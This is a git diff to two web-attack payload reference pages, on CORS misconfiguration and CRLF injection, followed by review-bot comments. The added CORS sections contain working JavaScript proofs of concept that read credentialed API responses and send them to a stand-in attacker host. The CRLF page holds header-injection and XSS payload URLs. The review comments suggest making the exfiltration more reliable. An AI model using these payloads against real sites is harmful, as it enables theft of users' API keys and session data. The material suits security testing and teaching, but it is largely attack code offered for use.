diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index cc066f9..32f00ad 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -22,7 +22,7 @@ ## Exploitation -Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. ### Vulnerable Example: Origin Reflection @@ -43,6 +43,8 @@ Access-Control-Allow-Credentials: true #### Proof of concept +This PoC requires that the respective JS script is hosted at `evil.com` + ```js var req = new XMLHttpRequest(); req.onload = reqListener; 
@@ -173,6 +175,75 @@ function reqListener() { }; ``` +### Vulnerable Example: Expanding the Origin / Regex Issues +Occasionally, certain expantions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header. + +#### Vulnerable Implementation (Example 1) + +In this scenario any prefix inserted in front of `example.com` will be accepted by the server. + +``` +GET /endpoint HTTP/1.1 +Host: api.example.com +Origin: https://evilexample.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evilexample.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} + +``` + +#### Proof of concept (Example 1) + +This PoC requires the respective JS script to be hosted at `evilexample.com` + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +#### Vulnerable Implementation (Example 2) + +In this scenario the server utilizes a regex where the dot was not escaped correctly. For instance, something like this: `^api.example.com$` instead of `^api\.example.com$`. Thus, the dot can be replaced with any letter to gain access from a third-party domain. 
+ +``` +GET /endpoint HTTP/1.1 +Host: api.example.com +Origin: https://apiiexample.com + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://apiiexample.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} + +``` + +#### Proof of concept (Example 2) + +This PoC requires the respective JS script to be hosted at `apiiexample.com` + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://api.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + ## Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) @@ -188,3 +259,4 @@ function reqListener() { * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) * [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) +* [CORS Misconfigurations Explained - Detectify Blog](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/) diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 534228a..04fe4f8 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -16,13 +16,13 @@ Requested page -```powershell +```http http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue ``` HTTP Response -```powershell +```http Connection: keep-alive Content-Length: 178 Content-Type: text/html @@ -45,7 +45,7 @@ http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23 HTTP Response -```powershell +```http HTTP/1.1 200 OK Date: Tue, 20 Dec 2016 14:34:03 GMT Content-Type: text/html; charset=utf-8 
@@ -70,13 +70,13 @@ X-XSS-Protection:0 Requested page -```powershell +```http http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E ``` HTTP response -```powershell +```http Set-Cookie:en Content-Length: 0 @@ -92,7 +92,7 @@ Content-Length: 34 Using UTF-8 encoding -```powershell +```http %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE ``` @@ -103,6 +103,11 @@ Remainder: * %E5%98%BE = %3E = \u563e (>) * %E5%98%BC = %3C = \u563c (<) + +## Exploitation Tricks +* Try to search for parameters that lead to redirects and fuzz them +* Also test the mobile version of the website, sometimes it is different or uses a different backend + ## References * https://www.owasp.org/index.php/CRLF_Injection
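Review bot: the sentence added in the `@@ -43,6 +43,8` hunk of `CORS Misconfiguration/README.md` is missing its terminating period and should say that the whole attacker page, not only the script file, must be served from `evil.com`, because the browser decides whether to attach the victim's cookies and expose the response based on the origin of the document that issues the request. Suggest: "This PoC requires that the attacker's page (and the JS below) is served from `https://evil.com`, the origin reflected in the example above."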
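Review bot: in the `@@ -173,6 +175,75` hunk of `CORS Misconfiguration/README.md` the "correct" regex offered as the fix for Example 2, `^api\.example.com$`, still leaves the second dot unescaped and therefore has the same flaw it is meant to illustrate; it should read `^api\.example\.com$`. It is also worth saying that this pattern can only be matched against the host part, since the `Origin` header in the example carries a scheme (`https://apiiexample.com`). Further points in the same hunk: "expantions" should be "expansions" and "a badly implemented regular expressions" should be "a badly implemented regular expression"; the exfiltration host in both PoCs is misspelled `atttacker.net` (three t's) and should be `attacker.net`; and `this.responseText` is concatenated into the URL unencoded, so `location='//attacker.net/log?key='+encodeURIComponent(this.responseText);` is the more reliable form when the leaked body contains `&`, `#` or whitespace.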
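Review bot: the fence-language change in the `@@ -16,13 +16,13` hunk of `CRLF Injection/README.md` (and the same change at `@@ -70` and `@@ -92`) applies the `http` tag to the "Requested page" blocks, which contain a bare URL such as `http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue` rather than an HTTP message, so the highlighter will not treat them as HTTP. Either keep those blocks untagged and reserve `http` for the response blocks, or rewrite the request blocks as actual request lines (`GET /%0D%0ASet-Cookie:mycookie=myvalue HTTP/1.1`) so the tag is accurate.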
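Review bot: the first bullet added in the `@@ -103,6 +103,11` hunk of `CRLF Injection/README.md`, "Try to search for parameters that lead to redirects and fuzz them", does not say what to fuzz with or why redirects matter; suggest spelling it out as "Look for parameters whose value is reflected in a `Location` or `Set-Cookie` header (redirect targets, language or session parameters) and inject `%0d%0a` sequences there, as in the examples above", so the tip ties back to the header-injection payloads the page already documents. The second bullet should also state the expected difference ("the mobile site may be served by a different backend that does not strip CR/LF") rather than only that it "is different".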